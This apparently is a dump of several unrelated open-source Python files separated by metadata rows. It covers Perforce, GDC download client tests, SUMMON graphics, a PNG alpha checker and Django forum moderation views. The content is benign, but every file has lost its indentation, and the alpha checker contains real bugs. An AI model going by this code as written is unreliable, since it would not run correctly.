name, tenant_uuid, system_managed=False
),
raises(exceptions.ConflictException).matching(
has_properties(
'status_code', 409, 'resource', 'groups', 'details', has_key('name')
)
),
)
@fixtures.db.group()
def test_delete(self, group_uuid):
self._group_dao.delete(group_uuid)
assert_that(
calling(self._group_dao.delete).with_args(group_uuid),
raises(exceptions.UnknownGroupException),
)
@fixtures.db.user()
@fixtures.db.user()
@fixtures.db.group(name='foo')
@fixtures.db.group(name='bar')
@fixtures.db.group(name='baz')
def test_list(self, user1_uuid, user2_uuid, *group_uuids):
def build_list_matcher(*names):
return [has_entries('name', name) for name in names]
result = self._group_dao.list_()
expected = build_list_matcher('foo', 'bar', 'baz')
assert_that(result, contains_inanyorder(*expected))
for group_uuid in group_uuids:
self._group_dao.add_user(group_uuid, user1_uuid)
self._group_dao.add_user(group_uuid, user2_uuid)
result = self._group_dao.list_()
expected = build_list_matcher('foo', 'bar', 'baz')
assert_that(result, contains_inanyorder(*expected))
result = self._group_dao.list_(name='foo')
expected = build_list_matcher('foo')
assert_that(result, contains_inanyorder(*expected))
result = self._group_dao.list_(search='ba')
expected = build_list_matcher('bar', 'baz')
assert_that(result, contains_inanyorder(*expected))
result = self._group_dao.list_(order='name', direction='desc')
expected = build_list_matcher('foo', 'baz', 'bar')
assert_that(result, contains(*expected))
result = self._group_dao.list_(order='name', direction='asc', limit=2)
expected = build_list_matcher('bar', 'baz')
assert_that(result, contains(*expected))
result = self._group_dao.list_(order='name', direction='asc', offset=1)
expected = build_list_matcher('baz', 'foo')
assert_that(result, contains(*expected))
@fixtures.db.group()
@fixtures.db.policy()
def test_remove_policy(self, group_uuid, policy_uuid):
nb_deleted = self._group_dao.remove_policy(group_uuid, policy_uuid)
assert_that(nb_deleted, equal_to(0))
self._group_dao.add_policy(group_uuid, policy_uuid)
nb_deleted = self._group_dao.remove_policy(self.unknown_uuid, policy_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_policy(group_uuid, self.unknown_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_policy(group_uuid, policy_uuid)
assert_that(nb_deleted, equal_to(1))
@fixtures.db.user()
@fixtures.db.group()
def test_remove_user(self, user_uuid, group_uuid):
nb_deleted = self._group_dao.remove_user(group_uuid, user_uuid)
assert_that(nb_deleted, equal_to(0))
self._group_dao.add_user(group_uuid, user_uuid)
nb_deleted = self._group_dao.remove_user(self.unknown_uuid, user_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_user(group_uuid, self.unknown_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_user(group_uuid, user_uuid)
assert_that(nb_deleted, equal_to(1))
| gpl-3.0 | 9,132,239,293,789,364,000 | 34.427136 | 88 | 0.620142 | false |
NCI-GDC/gdc-client | tests/test_download_client.py | 1 | 6942 | import argparse
from multiprocessing import cpu_count
import os
from pathlib import Path
import pytest
import tarfile
from typing import List
from unittest.mock import patch
from gdc_client.common.config import GDCClientArgumentParser
from gdc_client.parcel.const import HTTP_CHUNK_SIZE, SAVE_INTERVAL
from gdc_client.parcel.download_stream import DownloadStream
from conftest import make_tarfile, md5, uuids
from gdc_client.download.client import GDCHTTPDownloadClient, fix_url
from gdc_client.download.parser import download
from gdc_client.query.index import GDCIndexClient
BASE_URL = "http://127.0.0.1:5000"
@pytest.mark.usefixtures("setup_mock_server")
class TestDownloadClient:
@pytest.fixture(autouse=True)
def setup_method_fixture(self, tmp_path: Path) -> None:
self.index_client = GDCIndexClient(BASE_URL)
self.tmp_path = tmp_path
# use str version to be 3.5 compatible
self.client_kwargs = self.get_client_kwargs(str(self.tmp_path))
self.client = self.get_download_client()
self.argparse_args = self.get_argparse_args(str(self.tmp_path))
def get_client_kwargs(self, path: str) -> dict:
return {
"token": "valid token",
"n_procs": min(cpu_count(), 8),
"directory": path,
"segment_md5sums": True,
"file_md5sum": True,
"debug": True,
"http_chunk_size": HTTP_CHUNK_SIZE,
"save_interval": SAVE_INTERVAL,
"download_related_files": True,
"download_annotations": True,
"no_auto_retry": True,
"retry_amount": 5,
"verify": True,
}
def get_argparse_args(self, path: str) -> argparse.Namespace:
cmd_line_args = {
"server": BASE_URL,
"n_processes": 1,
"dir": path,
"save_interval": SAVE_INTERVAL,
"http_chunk_size": HTTP_CHUNK_SIZE,
"no_segment_md5sums": False,
"no_file_md5sum": False,
"no_verify": False,
"no_related_files": False,
"no_annotations": False,
"no_auto_retry": False,
"retry_amount": 1,
"wait_time": 5.0,
"latest": False,
"color_off": False,
"file_ids": [],
"manifest": [],
"token_file": "valid token",
"debug": True,
}
args = argparse.Namespace()
args.__dict__.update(cmd_line_args)
return args
def get_download_client(self, uuids: List[str] = None) -> GDCHTTPDownloadClient:
if uuids is not None:
# get annotation id out of metadata
self.index_client._get_metadata(uuids)
return GDCHTTPDownloadClient(
uri=BASE_URL, index_client=self.index_client, **self.client_kwargs
)
def test_download_files_with_fake_uuid_throw_exception_to_developer(self) -> None:
url_with_fake_uuid = BASE_URL + "/data/fake-uuid"
with pytest.raises(RuntimeError):
self.client.download_files([url_with_fake_uuid])
def test_download_files_with_fake_uuid_not_throw_exception_to_user(self) -> None:
url_with_fake_uuid = BASE_URL + "/data/fake-uuid"
self.client_kwargs["debug"] = False
client_with_debug_off = self.get_download_client()
client_with_debug_off.download_files([url_with_fake_uuid])
def test_untar_file(self) -> None:
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
tarfile_name = make_tarfile(files_to_tar)
self.client._untar_file(tarfile_name)
assert all((self.tmp_path / f).exists() for f in files_to_tar)
def test_md5_members(self) -> None:
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
client = self.get_download_client(files_to_tar)
tarfile_name = make_tarfile(files_to_tar)
client._untar_file(tarfile_name)
errors = client._md5_members(files_to_tar)
assert errors == []
def test_download_tarfile(self) -> None:
# this is done after the small file sorting happens,
# so pick UUIDs that would be grouped together
files_to_dl = ["small_no_friends"]
client = self.get_download_client(files_to_dl)
# it will remove redundant uuids
tarfile_name, errors = client._download_tarfile(files_to_dl)
assert tarfile_name is not None
assert os.path.exists(tarfile_name)
assert tarfile.is_tarfile(tarfile_name) is True
with tarfile.open(tarfile_name, "r") as t:
for member in t.getmembers():
contents = t.extractfile(member).read().decode()
assert contents == uuids[member.name]["contents"]
def test_download_annotations(self) -> None:
# uuid of file that has an annotation
small_ann = "small_ann"
# where we expect annotations to be written
dir_path = self.tmp_path / small_ann
dir_path.mkdir()
file_path = dir_path / "annotations.txt"
client = self.get_download_client([small_ann])
# we mock the response from api, a gzipped tarfile with an annotations.txt in it
# this code will open that and write the annotations.txt to a particular path
# no return
client.download_annotations(small_ann)
# verify
assert file_path.exists(), "failed to write annotations file"
assert (
file_path.read_text() == uuids["annotations.txt"]["contents"]
), "annotations content incorrect"
@pytest.mark.parametrize("check_segments", (True, False))
def test_no_segment_md5sums_args(self, check_segments: bool) -> None:
self.client_kwargs["segment_md5sums"] = check_segments
self.get_download_client()
assert DownloadStream.check_segment_md5sums is check_segments
@patch("gdc_client.parcel.download_stream.max_timeout", 1)
def test_retry_entire_download(self) -> None:
file_ids = ["big_no_friends"]
self.argparse_args.file_ids = file_ids
parser = GDCClientArgumentParser()
download(parser, self.argparse_args)
file_path = self.tmp_path / file_ids[0] / "test_file.txt"
temp_file_path = self.tmp_path / file_ids[0] / "test_file.txt.partial"
assert file_path.exists(), "Failed to write test_file.txt"
assert (
file_path.read_text() == uuids["big_no_friends"]["contents"]
), "File contents of test_file.txt are incorrect"
assert (
not temp_file_path.exists()
), "test_file.txt.partial should not exist on successful download"
def test_fix_url() -> None:
fixed_url = "https://api.gdc.cancer.gov/"
assert fix_url("api.gdc.cancer.gov") == fixed_url
assert fix_url(fixed_url) == fixed_url
assert fix_url("api.gdc.cancer.gov/") == fixed_url
| apache-2.0 | 2,527,070,955,373,266,000 | 35.34555 | 88 | 0.615529 | false |
mdrasmus/summon | examples/10_text.py | 1 | 4125 | #!/usr/bin/env python-i
# SUMMON examples
# 10_text.py - example of text
#
# Try zoomin in and out so see affects on text. Use CTRL-right drag and
# SHIFT-right drag to zoom and x and y axis separately.
#
# make summon commands available
from summon.core import *
from summon import shapes
import summon
win = summon.Window("10_text")
width = 100
a = 0
b = width * (1/3.0)
c = width * (2/3.0)
d = width
##################
# Bitmap Text
#
# Always the same on-screen size. Clips when text cannot fit in bounding box
#
x = 0
y = 0
win.add_group(translate(x, y,
# draw white box and title text
color(1,1,1),
shapes.box(0, 0, width, width, fill=False),
text("bitmap (text)", a, d+b/2, d, d+d, "bottom", "center"),
# draw demo text with each justification
text("NW", a, c, b, d, "top", "left"),
text("N", b, c, c, d, "top", "center"),
text("NE", c, c, d, d, "top", "right"),
text("W", a, b, b, c, "middle", "left"),
text("X", b, b, c, c, "middle", "center"),
text("E", c, b, d, c, "middle", "right"),
text("SW", a, a, b, b, "bottom", "left"),
text("S", b, a, c, b, "bottom", "center"),
text("SE", c, a, d, b, "bottom", "right")))
##################
# Scale Text
#
# Text is drawn with lines. Always visible, scales to fit as large as
# possible inside bounding box
#
x = 110
y = 0
win.add_group(
translate(x, y,
# draw white box and title text
color(1,1,1),
shapes.box(0, 0, width, width, fill=False),
text_scale("vector (text_scale)", a, d+b/2, d, d+d, "bottom", "center"),
# draw demo text with each justification
text_scale("NW", a, c, b, d, "top", "left"),
text_scale("N", b, c, c, d, "top", "center"),
text_scale("NE", c, c, d, d, "top", "right"),
text_scale("W", a, b, b, c, "middle", "left"),
text_scale("X", b, b, c, c, "middle", "center"),
text_scale("E", c, b, d, c, "middle", "right"),
text_scale("SW", a, a, b, b, "bottom", "left"),
text_scale("S", b, a, c, b, "bottom", "center"),
text_scale("SE", c, a, d, b, "bottom", "right")))
##################
# Clip Text
#
# Similar to Scale Text except it has a minimum and maximum height. Also
# text will not distort when x and y axis are zoomed independently.
#
x = 220
y = 0
minsize = 10
maxsize = 33
win.add_group(
translate(x, y,
# draw white box and title text
color(1,1,1),
shapes.box(0, 0, width, width, fill=False),
text_clip("vector+clip (text_clip)", a, d+b/2, d, d+d,
0, maxsize, "bottom", "center"),
# draw demo text with each justification
text_clip("NW", a, c, b, d, minsize, maxsize, "top", "left"),
text_clip("N", b, c, c, d, minsize, maxsize, "top", "center"),
text_clip("NE", c, c, d, d, minsize, maxsize, "top", "right"),
text_clip("W", a, b, b, c, minsize, maxsize, "middle", "left"),
text_clip("X", b, b, c, c, minsize, maxsize, "middle", "center"),
text_clip("E", c, b, d, c, minsize, maxsize, "middle", "right"),
text_clip("SW", a, a, b, b, minsize, maxsize, "bottom", "left"),
text_clip("S", b, a, c, b, minsize, maxsize, "bottom", "center"),
text_clip("SE", c, a, d, b, minsize, maxsize, "bottom", "right")))
# center the "camera" so that all shapes are in view
win.home()
print
print "NOTE: use shift+right drag and ctrl+right drag to zoom"
print "x and y axis independently. Notice how the text on the left and"
print "right do not distort as the text in the middle does."
print
| gpl-2.0 | -6,255,340,098,910,020,000 | 32.811475 | 86 | 0.48703 | false |
xxd3vin/spp-sdk | tools/script/python/check_png_alpha.py | 1 | 2741 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#*************************************************************************
#
# This file is part of the UGE(Uniform Game Engine).
# Copyright (C) by SanPolo Co.Ltd.
# All rights reserved.
#
# See http://uge.spolo.org/ for more information.
#
# SanPolo Co.Ltd
# http://uge.spolo.org/ [email protected] [email protected]
#
#************************************************************************
import os, sys
import numpy
import Image
import argparse # 处理参数使用
#import common # 一些通用的函数
import argparse
def encodeChinese(msg):
type = sys.getfilesystemencoding()
return msg.decode('utf-8').encode(type)
parser = argparse.ArgumentParser(description=encodeChinese('检测给定路径图片是否包含alpha通道'))
parser.add_argument('--str', action='store', dest='image_str',
help=encodeChinese('保存图片的路径'))
parser.add_argument('--log', action='store', dest='log_filename',
help=encodeChinese('输出错误日志'))
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
args = parser.parse_args()
# 判断必须给定的参数
if args.image_str is None :
print encodeChinese('没有输入保存图片文件的文件夹')
sys.exit()
if args.log_filename is None :
print encodeChinese('没有输入保存错误信息的日志文件名称')
sys.exit()
#截取错误日至路径
#判断原错误日至是否存在,若存在则删除
if os.path.isfile(args.log_filename):
os.remove(args.log_filename)
file_path = open(args.image_str,'r')
file_info = file_path.read()
for item in file_info.split("\n"):
if len(item) != 0:
try:
img = Image.open(item)
except:
print str(item) + '\t' + encodeChinese("这个文件不是贴图,无法打开")
f = open(args.log_filename,'a')
f.write(str(item) + '\t' + encodeChinese("这个文件不是贴图,无法打开"))
f.write('\n')
f.close()
continue
if img.mode.lower == 'rgba':
img.load()
r,g,b,alpha = img.split()
arr = numpy.asarray(alpha)
count = 0;
print str(img.size)
print str(item)
try:
for i in range(0,img.size[0]-1):
for j in range(0,img.size[1]-1):
if arr[j][i]<127:
count += 1
except:
print str(filename)+ '\t' + encodeChinese("for循环出现问题,并未计算其透明通道")
continue
if(count < 10):
notAlphafile = str(filename) + '\t' + encodeChinese("这个贴图文件的透明通道,透明的太少,不符合标准")
try:
f = open(args.log_filename,'a')
f.write(notAlphafile+'\n');
f.close()
except:
f.write(notAlphafile+'\n');
f.close()
else:
print filename + " is ok! " + str(count)
| mit | 599,075,209,702,383,100 | 24.378947 | 82 | 0.605558 | false |
nitely/Spirit | spirit/topic/moderate/views.py | 1 | 3059 | # -*- coding: utf-8 -*-
from django.utils import timezone
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib import messages
from django.utils.translation import gettext as _
from spirit.core.utils.views import is_post
from spirit.core.utils.decorators import moderator_required
from spirit.comment.models import Comment
from spirit.topic.models import Topic
@moderator_required
def _moderate(request, pk, field_name, to_value, action=None, message=None):
topic = get_object_or_404(Topic, pk=pk)
if is_post(request):
count = (
Topic.objects
.filter(pk=pk)
.exclude(**{field_name: to_value})
.update(**{
field_name: to_value,
'reindex_at': timezone.now()}))
if count and action is not None:
Comment.create_moderation_action(
user=request.user,
topic=topic,
action=action)
if message is not None:
messages.info(request, message)
return redirect(request.POST.get(
'next', topic.get_absolute_url()))
return render(
request=request,
template_name='spirit/topic/moderate.html',
context={'topic': topic})
def delete(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_removed',
to_value=True,
message=_("The topic has been deleted"))
def undelete(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_removed',
to_value=False,
message=_("The topic has been undeleted"))
def lock(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_closed',
to_value=True,
action=Comment.CLOSED,
message=_("The topic has been locked"))
def unlock(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_closed',
to_value=False,
action=Comment.UNCLOSED,
message=_("The topic has been unlocked"))
def pin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_pinned',
to_value=True,
action=Comment.PINNED,
message=_("The topic has been pinned"))
def unpin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_pinned',
to_value=False,
action=Comment.UNPINNED,
message=_("The topic has been unpinned"))
def global_pin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_globally_pinned',
to_value=True,
action=Comment.PINNED,
message=_("The topic has been globally pinned"))
def global_unpin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_globally_pinned',
to_value=False,
action=Comment.UNPINNED,
message=_("The topic has been globally unpinned"))
| mit | 8,956,407,924,800,457,000 | 24.491667 | 76 | 0.592677 | false |
theiviaxx/python-perforce | perforce/models.py | 1 | 35586 | # -*- coding: utf-8 -*-
"""
perforce.models
~~~~~~~~~~~~~~~
This module implements the main data models used by perforce
:copyright: (c) 2015 by Brett Dixon
:license: MIT, see LICENSE for more details
"""
import subprocess
import datetime
import traceback
import os
import marshal
import logging
import re
from collections import namedtuple
from functools import wraps
import path
import six
from perforce import errors
LOGGER = logging.getLogger(__name__)
CHAR_LIMIT = 8000
DATE_FORMAT = "%Y/%m/%d %H:%M:%S"
FORMAT = """Change: {change}
Client: {client}
User: {user}
Status: {status}
Description:
\t{description}
Files:
{files}
"""
NEW_FORMAT = """Change: new
Client: {client}
Status: new
Description:
\t{description}
"""
#: Error levels enum
ErrorLevel = namedtuple('ErrorLevel', 'EMPTY, INFO, WARN, FAILED, FATAL')(*range(5))
#: Connections status enum
ConnectionStatus = namedtuple('ConnectionStatus', 'OK, OFFLINE, NO_AUTH, INVALID_CLIENT')(*range(4))
#: File spec http://www.perforce.com/perforce/doc.current/manuals/cmdref/filespecs.html
FileSpec = namedtuple('FileSpec', 'depot,client')
RE_FILESPEC = re.compile('^"?(//[\w\d\_\/\.\s]+)"?\s')
def split_ls(func):
"""Decorator to split files into manageable chunks as not to exceed the windows cmd limit
:param func: Function to call for each chunk
:type func: :py:class:Function
"""
@wraps(func)
def wrapper(self, files, silent=True, exclude_deleted=False):
if not isinstance(files, (tuple, list)):
files = [files]
counter = 0
index = 0
results = []
while files:
if index >= len(files):
results += func(self, files, silent, exclude_deleted)
break
length = len(str(files[index]))
if length + counter > CHAR_LIMIT:
# -- at our limit
runfiles = files[:index]
files = files[index:]
counter = 0
index = 0
results += func(self, runfiles, silent, exclude_deleted)
runfiles = None
del runfiles
else:
index += 1
counter += length
return results
return wrapper
def camel_case(string):
"""Makes a string camelCase
:param string: String to convert
"""
return ''.join((string[0].lower(), string[1:]))
class Connection(object):
"""This is the connection to perforce and does all of the communication with the perforce server"""
def __init__(self, port=None, client=None, user=None, executable='p4', level=ErrorLevel.FAILED):
self._executable = executable
self._level = level
self._port = port
self._client = client
self._user = user
self.__getVariables()
# -- Make sure we can even proceed with anything
if self._port is None:
raise errors.ConnectionError('Perforce host could not be found, please set P4PORT or provide the hostname\
and port')
if self._user is None:
raise errors.ConnectionError('No user could be found, please set P4USER or provide the user')
def __repr__(self):
return '<Connection: {0}, {1}, {2}>'.format(self._port, str(self._client), self._user)
def __getVariables(self):
"""Parses the P4 env vars using 'set p4'"""
try:
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
output = subprocess.check_output([self._executable, 'set'], startupinfo=startupinfo)
if six.PY3:
output = str(output, 'utf8')
except subprocess.CalledProcessError as err:
LOGGER.error(err)
return
p4vars = {}
for line in output.splitlines():
if not line:
continue
try:
k, v = line.split('=', 1)
except ValueError:
continue
p4vars[k.strip()] = v.strip().split(' (')[0]
if p4vars[k.strip()].startswith('(config'):
del p4vars[k.strip()]
self._port = self._port or os.getenv('P4PORT', p4vars.get('P4PORT'))
self._user = self._user or os.getenv('P4USER', p4vars.get('P4USER'))
self._client = self._client or os.getenv('P4CLIENT', p4vars.get('P4CLIENT'))
@property
def client(self):
"""The client used in perforce queries"""
if isinstance(self._client, six.string_types):
self._client = Client(self._client, self)
return self._client
@client.setter
def client(self, value):
if isinstance(value, Client):
self._client = value
elif isinstance(value, six.string_types):
self._client = Client(value, self)
else:
raise TypeError('{} not supported for client'.format(type(value)))
@property
def user(self):
"""The user used in perforce queries"""
return self._user
@property
def level(self):
"""The current exception level"""
return self._level
@level.setter
def level(self, value):
"""Set the current exception level"""
self._level = value
@property
def status(self):
"""The status of the connection to perforce"""
try:
# -- Check client
res = self.run(['info'])
if res[0]['clientName'] == '*unknown*':
return ConnectionStatus.INVALID_CLIENT
# -- Trigger an auth error if not logged in
self.run(['user', '-o'])
except errors.CommandError as err:
if 'password (P4PASSWD) invalid or unset' in str(err.args[0]):
return ConnectionStatus.NO_AUTH
if 'Connect to server failed' in str(err.args[0]):
return ConnectionStatus.OFFLINE
return ConnectionStatus.OK
def run(self, cmd, stdin=None, marshal_output=True, **kwargs):
"""Runs a p4 command and returns a list of dictionary objects
:param cmd: Command to run
:type cmd: list
:param stdin: Standard Input to send to the process
:type stdin: str
:param marshal_output: Whether or not to marshal the output from the command
:type marshal_output: bool
:param kwargs: Passes any other keyword arguments to subprocess
:raises: :class:`.error.CommandError`
:returns: list, records of results
"""
records = []
args = [self._executable, "-u", self._user, "-p", self._port]
if self._client:
args += ["-c", str(self._client)]
if marshal_output:
args.append('-G')
if isinstance(cmd, six.string_types):
raise ValueError('String commands are not supported, please use a list')
args += cmd
command = ' '.join(args)
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
proc = subprocess.Popen(
args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
**kwargs
)
if stdin:
proc.stdin.write(six.b(stdin))
if marshal_output:
try:
while True:
record = marshal.load(proc.stdout)
if record.get(b'code', '') == b'error' and record[b'severity'] >= self._level:
proc.stdin.close()
proc.stdout.close()
raise errors.CommandError(record[b'data'], record, command)
if isinstance(record, dict):
if six.PY2:
records.append(record)
else:
records.append({str(k, 'utf8'): str(v) if isinstance(v, int) else str(v, 'utf8', errors='ignore') for k, v in record.items()})
except EOFError:
pass
stdout, stderr = proc.communicate()
else:
records, stderr = proc.communicate()
if stderr:
raise errors.CommandError(stderr, command)
return records
@split_ls
def ls(self, files, silent=True, exclude_deleted=False):
"""List files
:param files: Perforce file spec
:type files: list
:param silent: Will not raise error for invalid files or files not under the client
:type silent: bool
:param exclude_deleted: Exclude deleted files from the query
:type exclude_deleted: bool
:raises: :class:`.errors.RevisionError`
:returns: list<:class:`.Revision`>
"""
try:
cmd = ['fstat']
if exclude_deleted:
cmd += ['-F', '^headAction=delete ^headAction=move/delete']
cmd += files
results = self.run(cmd)
except errors.CommandError as err:
if silent:
results = []
elif "is not under client's root" in str(err):
raise errors.RevisionError(err.args[0])
else:
raise
return [Revision(r, self) for r in results if r.get('code') != 'error']
def findChangelist(self, description=None):
"""Gets or creates a Changelist object with a description
:param description: The description to set or lookup
:type description: str
:returns: :class:`.Changelist`
"""
if description is None:
change = Default(self)
else:
if isinstance(description, six.integer_types):
change = Changelist(description, self)
else:
pending = self.run(['changes', '-l', '-s', 'pending', '-c', str(self._client), '-u', self._user])
for cl in pending:
if cl['desc'].strip() == description.strip():
LOGGER.debug('Changelist found: {}'.format(cl['change']))
change = Changelist(int(cl['change']), self)
break
else:
LOGGER.debug('No changelist found, creating one')
change = Changelist.create(description, self)
change.client = self._client
change.save()
return change
def add(self, filename, change=None):
"""Adds a new file to a changelist
:param filename: File path to add
:type filename: str
:param change: Changelist to add the file to
:type change: int
:returns: :class:`.Revision`
"""
try:
if not self.canAdd(filename):
raise errors.RevisionError('File is not under client path')
if change is None:
self.run(['add', filename])
else:
self.run(['add', '-c', str(change.change), filename])
data = self.run(['fstat', filename])[0]
except errors.CommandError as err:
LOGGER.debug(err)
raise errors.RevisionError('File is not under client path')
rev = Revision(data, self)
if isinstance(change, Changelist):
change.append(rev)
return rev
def canAdd(self, filename):
"""Determines if a filename can be added to the depot under the current client
:param filename: File path to add
:type filename: str
"""
try:
result = self.run(['add', '-n', '-t', 'text', filename])[0]
except errors.CommandError as err:
LOGGER.debug(err)
return False
if result.get('code') not in ('error', 'info'):
return True
LOGGER.warn('Unable to add {}: {}'.format(filename, result['data']))
return False
@six.python_2_unicode_compatible
class PerforceObject(object):
"""Abstract class for dealing with the dictionaries coming back from p4 commands
This is a simple descriptor for the incoming P4Dict
"""
def __init__(self, connection=None):
self._connection = connection or Connection()
self._p4dict = {}
def __str__(self):
return self.__unicode__()
def __unicode__(self):
return u'<{}>'.format(self.__class__.__name__)
def __repr__(self):
return self.__unicode__()
class FormObject(PerforceObject):
"""Abstract class for objects with a form api (client, stream, changelist)"""
READONLY = ()
COMMAND = ''
def __init__(self, connection):
super(FormObject, self).__init__(connection)
self._dirty = False
def save(self):
"""Saves the state of the changelist"""
if not self._dirty:
return
fields = []
formdata = dict(self._p4dict)
del formdata['code']
for key, value in six.iteritems(formdata):
match = re.search('\d$', key)
if match:
value = '\t{}'.format(value)
key = key[:match.start()]
value = value.replace('\n', '\n\t')
fields.append('{}: {}'.format(key, value))
form = '\n'.join(fields)
self._connection.run([self.COMMAND, '-i'], stdin=form, marshal_output=False)
self._dirty = False
class Changelist(PerforceObject):
"""
A Changelist is a collection of files that will be submitted as a single entry with a description and
timestamp
"""
def __init__(self, changelist=None, connection=None):
connection = connection or Connection()
super(Changelist, self).__init__(connection=connection)
self._files = None
self._dirty = False
self._reverted = False
self._change = changelist
self.query(files=False)
def __repr__(self):
return '<Changelist {}>'.format(self._change)
def __int__(self):
return int(self._change)
def __nonzero__(self):
return True
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if exc_type:
LOGGER.debug(traceback.format_exc())
raise errors.ChangelistError(exc_value)
self.save()
def __contains__(self, other):
if not isinstance(other, Revision):
raise TypeError('Value needs to be a Revision instance')
if self._files is None:
self.query()
names = [f.depotFile for f in self._files]
return other.depotFile in names
def __getitem__(self, name):
if self._files is None:
self.query()
return self._files[name]
def __len__(self):
if self._files is None:
self.query()
return len(self._files)
def __iadd__(self, other):
if self._files is None:
self.query()
if isinstance(other, list):
currentfiles = self._files[:]
try:
files = [str(f) for f in other]
cmd = ['edit', '-c', str(self.change)]
self._connection.run(cmd + files)
self._files += other
self.save()
except errors.CommandError:
self._files = currentfiles
raise
return self
def __eq__(self, other):
return int(self) == int(other)
def __format__(self, *args, **kwargs):
if self._files is None:
self.query()
kwargs = {
'change': self._p4dict['change'],
'client': str(self._p4dict['client']),
'user': self._p4dict['user'],
'status': self._p4dict['status'],
'description': self._p4dict['description'].replace('\n', '\n\t'),
'files': '\n'.join(['\t{}'.format(f.depotFile) for f in self._files])
}
return FORMAT.format(**kwargs)
def query(self, files=True):
"""Queries the depot to get the current status of the changelist"""
if self._change:
cl = str(self._change)
self._p4dict = {camel_case(k): v for k, v in six.iteritems(self._connection.run(['change', '-o', cl])[0])}
if files:
self._files = []
if self._p4dict.get('status') == 'pending' or self._change == 0:
change = self._change or 'default'
data = self._connection.run(['opened', '-c', str(change)])
self._files = [Revision(r, self._connection) for r in data]
else:
data = self._connection.run(['describe', str(self._change)])[0]
depotfiles = []
for k, v in six.iteritems(data):
if k.startswith('depotFile'):
depotfiles.append(v)
self._files = self._connection.ls(depotfiles)
def append(self, rev):
"""Adds a :py:class:Revision to this changelist and adds or checks it out if needed
:param rev: Revision to add
:type rev: :class:`.Revision`
"""
if not isinstance(rev, Revision):
results = self._connection.ls(rev)
if not results:
self._connection.add(rev, self)
return
rev = results[0]
if not rev in self:
if rev.isMapped:
rev.edit(self)
self._files.append(rev)
rev.changelist = self
self._dirty = True
def remove(self, rev, permanent=False):
"""Removes a revision from this changelist
:param rev: Revision to remove
:type rev: :class:`.Revision`
:param permanent: Whether or not we need to set the changelist to default
:type permanent: bool
"""
if not isinstance(rev, Revision):
raise TypeError('argument needs to be an instance of Revision')
if rev not in self:
raise ValueError('{} not in changelist'.format(rev))
self._files.remove(rev)
if not permanent:
rev.changelist = self._connection.default
def revert(self, unchanged_only=False):
"""Revert all files in this changelist
:param unchanged_only: Only revert unchanged files
:type unchanged_only: bool
:raises: :class:`.ChangelistError`
"""
if self._reverted:
raise errors.ChangelistError('This changelist has been reverted')
change = self._change
if self._change == 0:
change = 'default'
cmd = ['revert', '-c', str(change)]
if unchanged_only:
cmd.append('-a')
files = [f.depotFile for f in self._files]
if files:
cmd += files
self._connection.run(cmd)
self._files = []
self._reverted = True
def save(self):
"""Saves the state of the changelist"""
self._connection.run(['change', '-i'], stdin=format(self), marshal_output=False)
self._dirty = False
def submit(self):
"""Submits a chagelist to the depot"""
if self._dirty:
self.save()
self._connection.run(['submit', '-c', str(self._change)], marshal_output=False)
def delete(self):
"""Reverts all files in this changelist then deletes the changelist from perforce"""
try:
self.revert()
except errors.ChangelistError:
pass
self._connection.run(['change', '-d', str(self._change)])
@property
def change(self):
return int(self._change)
@property
def client(self):
"""Perforce client this changelist is under"""
return self._p4dict['client']
@client.setter
def client(self, client):
self._p4dict['client'] = client
self._dirty = True
@property
def description(self):
"""Changelist description"""
return self._p4dict['description'].strip()
@description.setter
def description(self, desc):
self._p4dict['description'] = desc.strip()
self._dirty = True
@property
def status(self):
return self._p4dict['status']
@property
def user(self):
return self._p4dict['user']
@property
def isDirty(self):
"""Does this changelist have unsaved changes"""
return self._dirty
@property
def time(self):
"""Creation time of this changelist"""
return datetime.datetime.strptime(self._p4dict['date'], DATE_FORMAT)
@staticmethod
def create(description='<Created by Python>', connection=None):
"""Creates a new changelist
:param connection: Connection to use to create the changelist
:type connection: :class:`.Connection`
:param description: Description for new changelist
:type description: str
:returns: :class:`.Changelist`
"""
connection = connection or Connection()
description = description.replace('\n', '\n\t')
form = NEW_FORMAT.format(client=str(connection.client), description=description)
result = connection.run(['change', '-i'], stdin=form, marshal_output=False)
return Changelist(int(result.split()[1]), connection)
class Default(Changelist):
def __init__(self, connection):
super(Default, self).__init__(None, connection)
data = self._connection.run(['opened', '-c', 'default'])
for f in data:
if self._files is None:
self._files = []
self._files.append(Revision(f, self._connection))
data = self._connection.run(['change', '-o'])[0]
self._change = 0
self._description = data['Description']
self._client = connection.client
self._time = None
self._status = 'new'
self._user = connection.user
def save(self):
"""Saves the state of the changelist"""
files = [f.depotFile for f in self._files]
cmd = ['reopen', '-c', 'default']
self._connection.run(cmd + files)
self._dirty = False
class Revision(PerforceObject):
"""A Revision represents a file on perforce at a given point in it's history"""
def __init__(self, data, connection=None):
connection = connection or Connection()
super(Revision, self).__init__(connection=connection)
if isinstance(data, six.string_types):
self._p4dict = {'depotFile': data}
self.query()
else:
self._p4dict = data
self._head = HeadRevision(self._p4dict)
self._changelist = None
self._filename = None
def __len__(self):
if 'fileSize' not in self._p4dict:
self._p4dict = self._connection.run(['fstat', '-m', '1', '-Ol', self.depotFile])[0]
